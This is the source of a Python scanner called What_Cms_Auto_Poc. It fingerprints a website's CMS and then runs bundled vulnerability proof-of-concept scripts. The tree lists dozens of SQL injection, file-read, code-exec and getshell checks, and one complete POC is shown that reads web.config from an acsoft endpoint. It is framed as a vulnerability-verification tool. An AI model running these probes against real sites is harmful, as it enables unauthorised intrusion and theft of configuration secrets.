├── .idea
├── .gitignore
├── What_Cms_Auto_Poc.iml
├── inspectionProfiles
│ ├── Project_Default.xml
│ └── profiles_settings.xml
├── misc.xml
└── modules.xml
├── README.md
├── What_Cms_Auto_Poc.py
├── cms_data
├── __init__.py
├── data.json
└── get_cms_data.py
├── control_poc.py
├── find_cms
├── CmsScanner.py
├── __init__.py
├── cms_enum.py
└── cms_model.py
└── pocs
├── __init__.py
├── acsoft
├── __init__.py
├── acsoft_GetFileContent_fileread.py
├── acsoft_GetFile_fileread.py
└── acsoft_GetXMLList_fileread.py
├── cmseasy
├── __init__.py
└── cmseasy_header_detail_sqli.py
├── dedecms
├── __init__.py
├── dedecms_download_redirect.py
├── dedecms_error_trace_disclosure.py
├── dedecms_recommend_sqli.py
├── dedecms_search_typeArr_sqli.py
└── dedecms_version.py
├── discuz
├── __init__.py
├── discuz_focus_flashxss.py
├── discuz_forum_message_ssrf.py
├── discuz_plugin_ques_sqli.py
└── discuz_x25_path_disclosure.py
├── dreamgallery
├── __init__.py
└── dreamgallery_album_id_sqli.py
├── ecshop
├── __init__.py
├── ecshop_flow_orderid_sqli.py
└── ecshop_uc_code_sqli.py
├── esccms
├── __init__.py
└── esccms_selectunitmember_unauth.py
├── eyou
├── __init__.py
├── eyou_admin_id_sqli.py
├── eyou_resetpw.py
├── eyou_user_kw_sqli.py
└── eyou_weakpass.py
├── fastmeeting
├── __init__.py
└── fastmeeting_download_filedownload.py
├── finecms
├── __init__.py
└── finecms_uploadfile.py
├── foosun
├── __init__.py
└── foosun_City_ajax_sqli.py
├── fsmcms
├── __init__.py
├── fsmcms_columninfo_sqli.py
├── fsmcms_p_replydetail_sqli.py
└── fsmcms_setup_reinstall.py
├── gowinsoft_jw
├── __init__.py
└── gowinsoft_jw_multi_sqli.py
├── hanweb
├── __init__.py
├── hanweb_VerifyCodeServlet_install.py
├── hanweb_downfile_filedownload.py
└── hanweb_readxml_fileread.py
├── joomla
├── __init__.py
├── joomla_com_docman_lfi.py
└── joomla_index_list_sqli.py
├── kxmail
├── __init__.py
└── kxmail_login_server_sqli.py
├── libsys
├── __init__.py
├── libsys_ajax_asyn_link_fileread.py
├── libsys_ajax_asyn_link_old_fileread.py
└── libsys_ajax_get_file_fileread.py
├── metinfo
├── __init__.py
├── metinfo_getpassword_sqli.py
└── metinfo_login_check_sqli.py
├── pageadmin
├── __init__.py
└── pageadmin_forge_viewstate.py
├── phpcms
├── __init__.py
├── phpcms_authkey_disclosure.py
├── phpcms_digg_add_sqli.py
├── phpcms_flash_upload_sqli.py
├── phpcms_product_code_exec.py
├── phpcms_v961_fileread.py
├── phpcms_v96_sqli.py
└── phpcms_v9_flash_xss.py
├── phpok
├── __init__.py
├── phpok_api_param_sqli.py
├── phpok_remote_image_getshell.py
└── phpok_res_action_control_filedownload.py
├── piaoyou
├── __init__.py
├── piaoyou_int_order_sqli.py
├── piaoyou_multi_sqli.py
├── piaoyou_newsview_list.py
├── piaoyou_six2_sqli.py
├── piaoyou_six_sqli.py
└── piaoyou_ten_sqli.py
├── poc_db.py
├── qibocms
├── __init__.py
├── qibocms_js_f_id_sqli.py
├── qibocms_s_fids_sqli.py
├── qibocms_search_code_exec.py
└── qibocms_search_sqli.py
├── seacms
├── __init__.py
├── seacms_order_code_exec.py
├── seacms_search_code_exec.py
└── seacms_search_jq_code_exec.py
├── shopex
├── __init__.py
└── shopex_phpinfo_disclosure.py
├── shopnc
├── __init__.py
└── shopnc_index_class_id_sqli.py
├── siteengine
├── __init__.py
└── siteengine_comments_module_sqli.py
├── siteserver
├── __init__.py
├── siteserver_UserNameCollection_sqli.py
├── siteserver_background_administrator_sqli.py
├── siteserver_background_keywordsFilting_sqli.py
├── siteserver_background_log_sqli.py
└── siteserver_background_taskLog_sqli.py
├── thinkphp
├── __init__.py
├── onethink_category_sqli.py
├── thinkphp_code_exec.py
└── thinkphp_v5_exec.py
├── thinksns
├── __init__.py
└── thinksns_category_code_exec.py
├── typecho
├── __init__.py
└── typecho_install_code_exec.py
├── umail
├── __init__.py
├── umail_physical_path.py
└── umail_sessionid_access.py
├── urp
├── __init__.py
├── urp_ReadJavaScriptServlet_fileread.py
├── urp_query.py
└── urp_query2.py
├── weaver_oa
├── __init__.py
├── weaver_oa_db_disclosure.py
├── weaver_oa_download_sqli.py
└── weaver_oa_filedownload.py
├── wecenter
├── __init__.py
└── wecenter_topic_id_sqli.py
├── wordpress
├── __init__.py
├── wordpress_admin_ajax_filedownload.py
├── wordpress_display_widgets_backdoor.py
├── wordpress_plugin_ShortCode_lfi.py
├── wordpress_plugin_azonpop_sqli.py
├── wordpress_plugin_mailpress_rce.py
├── wordpress_restapi_sqli.py
├── wordpress_url_redirect.py
└── wordpress_woocommerce_code_exec.py
├── xplus
├── __init__.py
├── xplus_2003_getshell.py
└── xplus_mysql_mssql_sqli.py
├── zfsoft
├── __init__.py
├── xml
│ ├── zfsoft_service_stryhm_sqli_false.xml
│ └── zfsoft_service_stryhm_sqli_true.xml
├── zfsoft_database_control.py
├── zfsoft_default3_bruteforce.py
└── zfsoft_service_stryhm_sqli.py
└── zuitu
├── __init__.py
└── zuitu_coupon_id_sqli.py
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 |
--------------------------------------------------------------------------------
/.idea/What_Cms_Auto_Poc.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/Project_Default.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # What_Cms_Auto_Poc
2 | What_Cms_Auto_Poc是由本人开发,根据CMS指纹库自动识别CMS,进而加载相关的POC验证漏洞.
3 |
4 |
5 |
6 |
7 | # 使用用法
8 | help 帮助
9 | show 显示参数设置
10 | set url 目标url set url http://example.com/
11 | set type 设置CMS类型,设置后可
12 | 跳过CMS识别 set type example
13 | list 显示支持的CMS
14 | search 搜索POC search example
15 | run 执行
16 | exit 退出
17 |
18 |
19 |
20 | # 平台
21 | python3
22 |
23 |
24 |
25 |
26 | # 说明
27 | 1.部分代码参考网上公开的脚本。
28 |
29 | 2.本工具仅限于进行漏洞验证,如若因此引起相关法律问题,概不负责。
30 |
31 | 3.所有POC均为开源,以后也一直如此,供大家参考和学习。
32 |
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/What_Cms_Auto_Poc.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from find_cms import *
4 | from pocs import poc_db
5 | import requests
6 | import control_poc
7 | import urllib3
8 |
# Silence urllib3's InsecureRequestWarning: url_check() below calls requests with
# verify=False, which otherwise warns on every HTTPS request. Certificate checking
# itself stays disabled for those calls; only the warning is hidden.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Start-up banner (ASCII art), printed once from the __main__ block.
logo = '''
__ ___ _ ____ _ _
\ \ / / |__ __ _| |_ / ___|_ __ ___ ___ / \ _ _| |_ ___
\ \ /\ / /| '_ \ / _` | __| | | | '_ ` _ \/ __| / _ \| | | | __/ _ \
\ V V / | | | | (_| | |_ | |___| | | | | \__ \ / ___ \ |_| | || (_) |
\_/\_/ |_| |_|\__,_|\__|___\____|_| |_| |_|___/___/_/ \_\__,_|\__\___/
|_____| |_____|
____
| _ \ ___ ___
| |_) / _ \ / __|
| __/ (_) | (__
____|_| \___/ \___|
|_____|

自动识别目标CMS类型,选择合适的POC验证漏洞 V1.0
'''
# Command reference printed by get_help() (on start-up and on "help");
# the same text is repeated in README.md.
usage = '''
opt:
---------------------------------------------------
help 帮助
show 显示参数设置
set url 目标url set url http://example.com/
set type 设置CMS类型,设置后可
跳过CMS识别 set type example
list 显示支持的CMS
search 搜索POC search example
run 执行
exit 退出
---------------------------------------------------
'''

# Shared scan state (url, name, type). set_url() rebinds this global with a
# fresh Cms_Model, so the other functions read it at call time.
cms_mode = Cms_Model()
# POC registry handed to control_poc.control, which reads its ``.data`` mapping.
mode = poc_db.poc_db()
43 |
44 |
def get_help():
    """Print the command reference held in the module-level ``usage`` string."""
    reference = usage
    print(reference)
47 |
48 |
def show():
    """Print the current target url and CMS type from the shared ``cms_mode``."""
    fields = (("url", cms_mode.url), ("type", cms_mode.type))
    for label, value in fields:
        print(f"[+]{label}: {value}")
52 |
53 |
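def url_check(url):
    """Return True when a GET of *url* answers HTTP 200, False otherwise.

    Used by set_url() to reject unreachable targets before a scan. The request
    matches the tool's other HTTP calls: fixed browser User-Agent, 20 s timeout
    and verify=False, so a certificate error neither fails the check nor gets
    reported. Only requests' own errors (DNS failure, refused connection,
    timeout, malformed url) mean "unreachable"; any other exception propagates
    instead of being hidden by a bare except.

    Args:
        url: target base url as typed by the user.

    Returns:
        bool: whether the target answered with status 200.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    try:
        result = requests.get(url, headers=headers, timeout=20, verify=False)
    except requests.RequestException:
        return False
    return result.status_code == 200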
66 |
67 |
def run():
    """Fingerprint the CMS unless a type was set by hand, then launch its POCs.

    Requires ``cms_mode.url`` to be set; prints a notice and returns otherwise.
    When fingerprinting cannot decide a type, nothing is launched.
    """
    if cms_mode.url == "":
        print("[+]请输入有效url")
        return
    if not cms_mode.type:
        scanner = CmsScanner(cms_mode)
        print("[+]执行中...")
        scanner.run()
        if not cms_mode.type:
            print("[+]无法判断CMS类型")
            return
        print(f"[+]CMS类型为{cms_mode.name}")
    control_poc.control(mode, cms_mode).auto_poc()
83 |
84 |
def cms_list():
    """Print one line per Cms_Enum member, showing its value."""
    for member in Cms_Enum:
        print("[+]支持的CMS类型:", member.value)
88 |
89 |
def search(cms):
    """Print every registered POC name containing *cms*, via control_poc.control.search()."""
    control_poc.control(mode, cms_mode).search(cms)
93 |
94 |
def set_url(url):
    """Reset the shared scan state and adopt *url* if it answers HTTP 200.

    The Cms_Model is recreated before the check, so a previously chosen type is
    dropped even when the new url is rejected.
    """
    global cms_mode
    cms_mode = Cms_Model()
    if not url_check(url):
        print("[+]url地址错误")
        return
    cms_mode.url = url
102 |
103 |
def set_type(cms_type):
    """Select the Cms_Enum member whose value equals *cms_type*; report when none does."""
    for member in Cms_Enum:
        if member.value == cms_type:
            cms_mode.type = member
            break
    else:
        print("[+]cms类型不支持")
113 |
114 |
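def control(text):
    """Dispatch one line typed at the ``->`` prompt.

    Multi-word lines: ``search <keyword>``, ``set url <url>``, ``set type <cms>``.
    Single words: ``exit``, ``help``, ``list``, ``show``, ``run``. Unknown input
    is ignored silently, as before. Tokens are split on any whitespace, so a
    doubled space no longer breaks a command, and ``set url`` / ``set type``
    without a value print a hint instead of raising IndexError and ending the
    input loop.

    Args:
        text: the raw input line.
    """
    keys = text.split()
    if not keys:
        return
    if len(keys) > 1:
        command, target = keys[0], keys[1]
        if command == "search":
            search(target)
        elif command == "set":
            if len(keys) < 3:
                print("[+]缺少参数,用法: set url <url> 或 set type <cms>")
            elif target == "url":
                set_url(keys[2])
            elif target == "type":
                set_type(keys[2])
        return
    command = keys[0]
    if command == "exit":
        # Same exit path as the previous exit() call, without depending on site's helper.
        raise SystemExit(0)
    if command == "help":
        get_help()
    elif command == "list":
        cms_list()
    elif command == "show":
        show()
    elif command == "run":
        run()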
136 |
137 |
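if __name__ == "__main__":
    print(logo)
    get_help()
    # Ctrl-D / Ctrl-C end the session cleanly instead of dumping a traceback.
    try:
        while True:
            control(input("->"))
    except (EOFError, KeyboardInterrupt):
        print()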
144 |
--------------------------------------------------------------------------------
/cms_data/__init__.py:
--------------------------------------------------------------------------------
1 | from cms_data.get_cms_data import *
2 |
--------------------------------------------------------------------------------
/cms_data/get_cms_data.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import json, os
4 |
5 |
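def get_cms_data(path=None):
    """Load the fingerprint table and split it into substring-match and md5-match entries.

    Args:
        path: location of the JSON file. Defaults to ``<cwd>/cms_data/data.json``,
            i.e. the tool has to be started from the repository root, exactly as
            before; callers may pass an explicit path instead.

    Returns:
        ``(re_data, md5_data)``: the entries whose ``"re"`` field is non-empty,
        and all remaining entries, each as the original dict from the file.

    Raises:
        OSError: the file cannot be opened.
        json.JSONDecodeError: the file is not valid JSON.
        KeyError: an entry has no ``"re"`` field.
    """
    if path is None:
        path = os.path.join(os.getcwd(), "cms_data", "data.json")
    # json.load() no longer accepts an ``encoding`` keyword (removed in Python
    # 3.9, ignored before that); the file is opened as UTF-8 text instead.
    with open(path, "r", encoding="utf-8") as f:
        datas = json.load(f)
    re_data = [entry for entry in datas if entry["re"] != ""]
    md5_data = [entry for entry in datas if entry["re"] == ""]
    return re_data, md5_data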
21 |
--------------------------------------------------------------------------------
/control_poc.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from pocs import *
4 |
5 |
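class control:
    """Drive the POC table in ``poc_db`` for the target described by ``cms_mode``.

    ``poc_db.data`` is read as a mapping ``{cms_key: {poc_name: code_string}}``
    by both methods below; ``cms_mode.type`` is the key looked up by auto_poc().
    """

    def __init__(self, poc_db, cms_mode):
        self.poc_db = poc_db
        self.cms_mode = cms_mode

    def search(self, cms):
        """Print every POC name, across all CMS entries, that contains *cms* as a substring."""
        for pocs in self.poc_db.data.values():
            for poc_name in pocs:
                if cms in poc_name:
                    print(f"[+]{poc_name}")

    def auto_poc(self):
        """Run every POC registered under ``cms_mode.type``; print a notice when there is none."""
        pocs = self.poc_db.data.get(self.cms_mode.type)
        if pocs is None:
            print("CMS类型不支持")
            return
        for code in pocs.values():
            # SECURITY NOTE: the table values are executed as Python source, so
            # whoever can edit poc_db (or the pocs package it is built from) runs
            # arbitrary code in this process; that table must be treated as code,
            # not as data. exec() is deliberately called without explicit
            # namespaces: the strings appear to rely on names visible here
            # (presumably ``self``) — confirm against poc_db before changing this.
            exec(code)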
39 |
--------------------------------------------------------------------------------
/find_cms/CmsScanner.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from cms_data.get_cms_data import *
4 | import hashlib, requests, threading
5 | from find_cms.cms_enum import *
6 | from find_cms.cms_model import *
7 |
8 | '''
9 | class re_find(threading.Thread):
10 |
11 | def __init__(self, cms_model, cms_data):
12 | super.__init__()
13 | self.cms_mode = cms_model
14 | self.cms_data = cms_data
15 |
16 | def get_cms_url(self):
17 |
18 | try:
19 | response = requests.get(self.cms_mode.url + self.cms_data["url"], timeout=5)
20 | if response.status_code == 200:
21 | return response.text
22 | return None
23 | except:
24 | return None
25 |
26 | def run(self):
27 | if self.cms_mode.flag:
28 | return
29 | text = get_cms_data()
30 | if text:
31 | return
32 | if self.cms_data["re"] in text:
33 | self.cms_mode.name = self.cms_data["name"]
34 | self.cms_mode.flag = True
35 |
36 | '''
37 |
38 |
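class CmsScanner:
    """Fingerprint the CMS behind ``cms_mode.url`` and write name and type onto the model.

    Two kinds of fingerprint come from get_cms_data(): entries whose ``re``
    string must occur in the body fetched from ``url``, and entries whose
    ``md5`` must equal the hex digest of that body. Each entry is probed on its
    own thread; once one matches no further probes are started, but threads
    already running still finish and may overwrite the name (last writer wins,
    as in the original implementation).
    """

    def __init__(self, cms_mode):
        re_data, md5_data = get_cms_data()
        self.re_Data = re_data            # attribute name kept for existing callers
        self.md5_data = md5_data
        self.cms_mode = cms_mode          # results are written back onto this model
        self.flag = False                 # set once any fingerprint has matched

    def get_cms_url(self, url):
        """GET ``cms_mode.url + url`` and return the body, or None on non-200 or request error.

        The two strings are joined verbatim, so base url and probe path have to
        agree about the slash between them. Only requests' own errors are
        swallowed; anything else propagates instead of being hidden.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            response = requests.get(self.cms_mode.url + url, headers=headers,
                                    timeout=5)
        except requests.RequestException:
            return None
        if response.status_code != 200:
            return None
        return response.text

    def re_find(self, name, re, url):
        """Record *name* when the string *re* occurs in the body fetched from *url*.

        Despite the parameter name, *re* is matched as a plain substring with
        ``in``, not compiled as a regular expression.
        """
        text = self.get_cms_url(url)
        if text is None:
            return
        if re in text:
            self._record(name)

    def md5_find(self, name, md5, url):
        """Record *name* when the md5 hex digest of the body fetched from *url* equals *md5*."""
        text = self.get_cms_url(url)
        if text is None:
            return
        # md5 serves only as a fingerprint of a static file here, not as a security primitive.
        if hashlib.md5(text.encode("utf-8")).hexdigest() == md5:
            self._record(name)

    def _record(self, name):
        """Store a match; called from worker threads, so concurrent matches race (last one wins)."""
        self.cms_mode.name = name
        self.flag = True

    def cms_type(self):
        """Resolve ``cms_mode.name`` to its Cms_Enum member; leaves ``type`` untouched when none matches."""
        for member in Cms_Enum:
            if member.value == self.cms_mode.name:
                self.cms_mode.type = member
                break

    def _spawn(self, target, args):
        """Start one probe thread and return it so run() can join it later."""
        worker = threading.Thread(target=target, args=args)
        worker.start()
        return worker

    def run(self):
        """Probe every fingerprint, wait for all workers, then fill in ``cms_mode.type``."""
        workers = []
        for entry in self.re_Data:
            if self.flag:
                break  # a match already landed; do not start further probes
            workers.append(self._spawn(self.re_find, (entry["name"], entry["re"], entry["url"])))
        for entry in self.md5_data:
            if self.flag:
                break
            workers.append(self._spawn(self.md5_find, (entry["name"], entry["md5"], entry["url"])))
        for worker in workers:
            worker.join()
        if self.cms_mode.name != "":
            self.cms_type()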
106 |
--------------------------------------------------------------------------------
/find_cms/__init__.py:
--------------------------------------------------------------------------------
1 | from find_cms.CmsScanner import *
2 | from find_cms.cms_enum import *
3 | from find_cms.cms_model import *
--------------------------------------------------------------------------------
/find_cms/cms_enum.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from enum import Enum
4 |
5 |
class Cms_Enum(Enum):
    """Closed set of supported CMS identifiers; each value doubles as the display name.

    ``CmsScanner.cms_type()`` and ``set_type()`` both match against ``.value``,
    so a value must equal the ``name`` field of the matching entry in
    cms_data/data.json and the word a user types after ``set type``.
    NOTE(review): ``FoosunCms`` is the one member whose value differs from its
    pocs/ package directory (``pocs/foosun``); confirm that poc_db keys its table
    on the enum member rather than on the directory name.
    """
    joomla = "joomla"
    phpcms = "phpcms"
    dedecms = "dedecms"
    seacms = "seacms"
    discuz = "discuz"
    acsoft = "acsoft"
    cmseasy = "cmseasy"
    dreamgallery = "dreamgallery"
    ecshop = "ecshop"
    eyou = "eyou"
    fastmeeting = "fastmeeting"
    finecms = "finecms"
    FoosunCms = "FoosunCms"
    fsmcms = "fsmcms"
    gowinsoft_jw = "gowinsoft_jw"
    hanweb = "hanweb"
    kxmail = "kxmail"
    libsys = "libsys"
    metinfo = "metinfo"
    pageadmin = "pageadmin"
    phpok = "phpok"
    piaoyou = "piaoyou"
    qibocms = "qibocms"
    shopex = "shopex"
    shopnc = "shopnc"
    siteengine = "siteengine"
    siteserver = "siteserver"
    thinkphp = "thinkphp"
    thinksns = "thinksns"
    typecho = "typecho"
    umail = "umail"
    urp = "urp"
    weaver_oa = "weaver_oa"
    wecenter = "wecenter"
    wordpress = "wordpress"
    xplus = "xplus"
    zfsoft = "zfsoft"
    zuitu = "zuitu"
46 |
--------------------------------------------------------------------------------
/find_cms/cms_model.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
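class Cms_Model:
    """Mutable scan state shared by the prompt loop, CmsScanner and control_poc.

    Attributes (all plain, set by other modules):
        name: CMS name written by CmsScanner when a fingerprint matches ("" until then).
        url:  target base url written by set_url() once it answers HTTP 200 ("" until then).
        type: the matching Cms_Enum member, or None while undecided.
    """

    def __init__(self):
        self.name = ""
        self.url = ""
        self.type = None

    def __repr__(self):
        # Debug aid only; shows the three fields the rest of the tool reads.
        return f"{self.__class__.__name__}(name={self.name!r}, url={self.url!r}, type={self.type!r})"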
10 |
--------------------------------------------------------------------------------
/pocs/__init__.py:
--------------------------------------------------------------------------------
1 | from pocs.dedecms.dedecms_download_redirect import *
2 | from pocs.dedecms.dedecms_error_trace_disclosure import *
3 | from pocs.dedecms.dedecms_recommend_sqli import *
4 | from pocs.dedecms.dedecms_search_typeArr_sqli import *
5 | from pocs.dedecms.dedecms_version import *
6 |
7 | from pocs.phpcms.phpcms_authkey_disclosure import *
8 | from pocs.phpcms.phpcms_digg_add_sqli import *
9 | from pocs.phpcms.phpcms_flash_upload_sqli import *
10 | from pocs.phpcms.phpcms_product_code_exec import *
11 | from pocs.phpcms.phpcms_v961_fileread import *
12 | from pocs.phpcms.phpcms_v96_sqli import *
13 | from pocs.phpcms.phpcms_v9_flash_xss import *
14 |
15 | from pocs.seacms.seacms_order_code_exec import *
16 | from pocs.seacms.seacms_search_code_exec import *
17 | from pocs.seacms.seacms_search_jq_code_exec import *
18 |
19 | from pocs.discuz.discuz_focus_flashxss import *
20 | from pocs.discuz.discuz_forum_message_ssrf import *
21 | from pocs.discuz.discuz_plugin_ques_sqli import *
22 | from pocs.discuz.discuz_x25_path_disclosure import *
23 |
24 | from pocs.acsoft.acsoft_GetFileContent_fileread import *
25 | from pocs.acsoft.acsoft_GetFile_fileread import *
26 | from pocs.acsoft.acsoft_GetXMLList_fileread import *
27 |
28 | from pocs.cmseasy.cmseasy_header_detail_sqli import *
29 |
30 | from pocs.dreamgallery.dreamgallery_album_id_sqli import *
31 |
32 | from pocs.ecshop.ecshop_flow_orderid_sqli import *
33 | from pocs.ecshop.ecshop_uc_code_sqli import *
34 |
35 | from pocs.eyou.eyou_admin_id_sqli import *
36 | from pocs.eyou.eyou_resetpw import *
37 | from pocs.eyou.eyou_user_kw_sqli import *
38 | from pocs.eyou.eyou_weakpass import *
39 |
40 | from pocs.fastmeeting.fastmeeting_download_filedownload import *
41 |
42 | from pocs.finecms.finecms_uploadfile import *
43 |
44 | from pocs.foosun.foosun_City_ajax_sqli import *
45 |
46 | from pocs.fsmcms.fsmcms_columninfo_sqli import *
47 | from pocs.fsmcms.fsmcms_p_replydetail_sqli import *
48 | from pocs.fsmcms.fsmcms_setup_reinstall import *
49 |
50 | from pocs.gowinsoft_jw.gowinsoft_jw_multi_sqli import *
51 |
52 | from pocs.hanweb.hanweb_VerifyCodeServlet_install import *
53 | from pocs.hanweb.hanweb_downfile_filedownload import *
54 | from pocs.hanweb.hanweb_readxml_fileread import *
55 |
56 | from pocs.joomla.joomla_com_docman_lfi import *
57 | from pocs.joomla.joomla_index_list_sqli import *
58 |
59 | from pocs.kxmail.kxmail_login_server_sqli import *
60 |
61 | from pocs.libsys.libsys_ajax_asyn_link_fileread import *
62 | from pocs.libsys.libsys_ajax_asyn_link_old_fileread import *
63 | from pocs.libsys.libsys_ajax_get_file_fileread import *
64 |
65 | from pocs.metinfo.metinfo_getpassword_sqli import *
66 | from pocs.metinfo.metinfo_login_check_sqli import *
67 |
68 | from pocs.pageadmin.pageadmin_forge_viewstate import *
69 |
70 | from pocs.phpok.phpok_api_param_sqli import *
71 | from pocs.phpok.phpok_remote_image_getshell import *
72 | from pocs.phpok.phpok_res_action_control_filedownload import *
73 |
74 | from pocs.piaoyou.piaoyou_int_order_sqli import *
75 | from pocs.piaoyou.piaoyou_multi_sqli import *
76 | from pocs.piaoyou.piaoyou_newsview_list import *
77 | from pocs.piaoyou.piaoyou_six2_sqli import *
78 | from pocs.piaoyou.piaoyou_six_sqli import *
79 | from pocs.piaoyou.piaoyou_ten_sqli import *
80 |
81 | from pocs.qibocms.qibocms_js_f_id_sqli import *
82 | from pocs.qibocms.qibocms_s_fids_sqli import *
83 | from pocs.qibocms.qibocms_search_code_exec import *
84 | from pocs.qibocms.qibocms_search_sqli import *
85 |
86 | from pocs.shopex.shopex_phpinfo_disclosure import *
87 |
88 | from pocs.shopnc.shopnc_index_class_id_sqli import *
89 |
90 | from pocs.siteengine.siteengine_comments_module_sqli import *
91 |
92 | from pocs.siteserver.siteserver_UserNameCollection_sqli import *
93 | from pocs.siteserver.siteserver_background_administrator_sqli import *
94 | from pocs.siteserver.siteserver_background_keywordsFilting_sqli import *
95 | from pocs.siteserver.siteserver_background_log_sqli import *
96 | from pocs.siteserver.siteserver_background_taskLog_sqli import *
97 |
98 | from pocs.thinkphp.onethink_category_sqli import *
99 | from pocs.thinkphp.thinkphp_code_exec import *
100 | from pocs.thinkphp.thinkphp_v5_exec import *
101 |
102 | from pocs.thinksns.thinksns_category_code_exec import *
103 |
104 | from pocs.typecho.typecho_install_code_exec import *
105 |
106 | from pocs.umail.umail_physical_path import *
107 | from pocs.umail.umail_sessionid_access import *
108 |
109 | from pocs.urp.urp_ReadJavaScriptServlet_fileread import *
110 | from pocs.urp.urp_query import *
111 | from pocs.urp.urp_query2 import *
112 |
113 | from pocs.weaver_oa.weaver_oa_db_disclosure import *
114 | from pocs.weaver_oa.weaver_oa_download_sqli import *
115 | from pocs.weaver_oa.weaver_oa_filedownload import *
116 |
117 | from pocs.wecenter.wecenter_topic_id_sqli import *
118 |
119 | from pocs.wordpress.wordpress_admin_ajax_filedownload import *
120 | from pocs.wordpress.wordpress_display_widgets_backdoor import *
121 | from pocs.wordpress.wordpress_plugin_ShortCode_lfi import *
122 | from pocs.wordpress.wordpress_plugin_azonpop_sqli import *
123 | from pocs.wordpress.wordpress_plugin_mailpress_rce import *
124 | from pocs.wordpress.wordpress_restapi_sqli import *
125 | from pocs.wordpress.wordpress_url_redirect import *
126 | from pocs.wordpress.wordpress_woocommerce_code_exec import *
127 |
128 | from pocs.xplus.xplus_2003_getshell import *
129 | from pocs.xplus.xplus_mysql_mssql_sqli import *
130 |
131 | from pocs.zfsoft.zfsoft_database_control import *
132 | from pocs.zfsoft.zfsoft_default3_bruteforce import *
133 | from pocs.zfsoft.zfsoft_service_stryhm_sqli import *
134 |
135 | from pocs.zuitu.zuitu_coupon_id_sqli import *
--------------------------------------------------------------------------------
/pocs/acsoft/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/acsoft/__init__.py
--------------------------------------------------------------------------------
/pocs/acsoft/acsoft_GetFileContent_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 安财软件GetFileContent任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0121651
6 | author: Lucifer
7 | description: 文件/WS/WebService.asmx/GetFileContent中,参数fileName存在任意文件读取。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class acsoft_GetFileContent_fileread_BaseVerify:
    """Verifier for the acsoft GetFileContent file-read issue named in the module header.

    The verdict rests on a single signal: a POST to /WS/WebService.asmx/GetFileContent
    whose response carries exactly ``Content-Type: application/xml`` is reported as
    vulnerable; every other outcome, including any exception, is reported as not.
    """

    def __init__(self, url):
        # Base url of the target; ``payload`` is appended to it verbatim in run().
        self.url = url

    def run(self):
        """Send the probe and print the verdict with cprint; nothing is returned to the caller."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        post_data = {
            "Content":"1",
            "fileName":"web.config"
        }
        payload = "/WS/WebService.asmx/GetFileContent"
        vulnurl = self.url + payload
        try:
            # verify=False: certificate problems neither stop the probe nor get reported.
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # Exact header comparison; a missing Content-Type raises KeyError, which the
            # bare except below turns into the "possibly not vulnerable" message.
            if req.headers["Content-Type"] == "application/xml":
                cprint("[+]存在安财软件GetFileContent任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            else:
                cprint("[-]不存在acsoft_GetFileContent_fileread漏洞", "white", "on_grey")

        except:
            # Bare except: connection errors, timeouts and the KeyError above all end here.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
38 |
if __name__ == "__main__":
    # Stand-alone use: one positional argument, the target base url; a missing
    # argument raises IndexError. Python warnings are silenced, which covers the
    # insecure-request warning emitted for verify=False.
    warnings.filterwarnings("ignore")
    testVuln = acsoft_GetFileContent_fileread_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/pocs/acsoft/acsoft_GetFile_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 安财软件GetFile任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0121651
6 | author: Lucifer
7 | description: 文件/WS/WebService.asmx/GetFile中,参数FileName存在任意文件读取。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class acsoft_GetFile_fileread_BaseVerify:
    """Verifier for the acsoft GetFile file-read issue named in the module header.

    The verdict rests on a single signal: a POST to /WS/WebService.asmx/GetFile
    whose response carries exactly ``Content-Type: application/xml`` is reported as
    vulnerable; every other outcome, including any exception, is reported as not.
    """

    def __init__(self, url):
        # Base url of the target; ``payload`` is appended to it verbatim in run().
        self.url = url

    def run(self):
        """Send the probe and print the verdict with cprint; nothing is returned to the caller."""
        headers = {
